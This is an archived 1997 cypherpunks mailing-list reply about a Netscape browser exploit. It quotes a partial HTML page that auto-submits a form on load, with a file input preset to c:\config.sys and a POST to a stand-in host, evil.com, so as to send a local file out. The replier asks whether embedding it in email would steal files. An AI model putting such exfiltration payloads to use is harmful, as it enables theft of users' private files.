From: nobody@REPLAY.COM (Anonymous)
To: cypherpunks@toad.com
Message Hash: 278ed6a3ea108890f1c556fe9595c5e7cb98a91e4dc26ad9cd2d6907cf8a5157
Message ID: <199707020350.FAA24898@basement.replay.com>
Reply To: N/A
UTC Datetime: 1997-07-02 04:16:02 UTC
Raw Date: Wed, 2 Jul 1997 12:16:02 +0800
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 2 Jul 1997 12:16:02 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape Exploit
Message-ID: <199707020350.FAA24898@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain
> >Here is a sample it isn't complete but you get the basic idea of what is
> >going on
> ><HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE><HEAD>
> >
> ><BODY onLoad="daForm.submit()">
> ><FORM
> > NAME="daForm"
> > ACTION="http://evil.com/cgi-bin/formmail.pl"
> > METHOD=POST>
> >
> ><INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on your
> >Harddrive">
> ><INPUT TYPE=HIDDEN NAME="recipient" value="foobar@evil.com">
> >
> >and so on and so forth...
So if someone was using Netscape to read mail, and I included a small bit
of HTML like the above, I could snarf up files out of everywhere?
Return to July 1997
Return to “nobody@REPLAY.COM (Anonymous)”
1997-07-02 (Wed, 2 Jul 1997 12:16:02 +0800) - Re: Netscape Exploit - nobody@REPLAY.COM (Anonymous)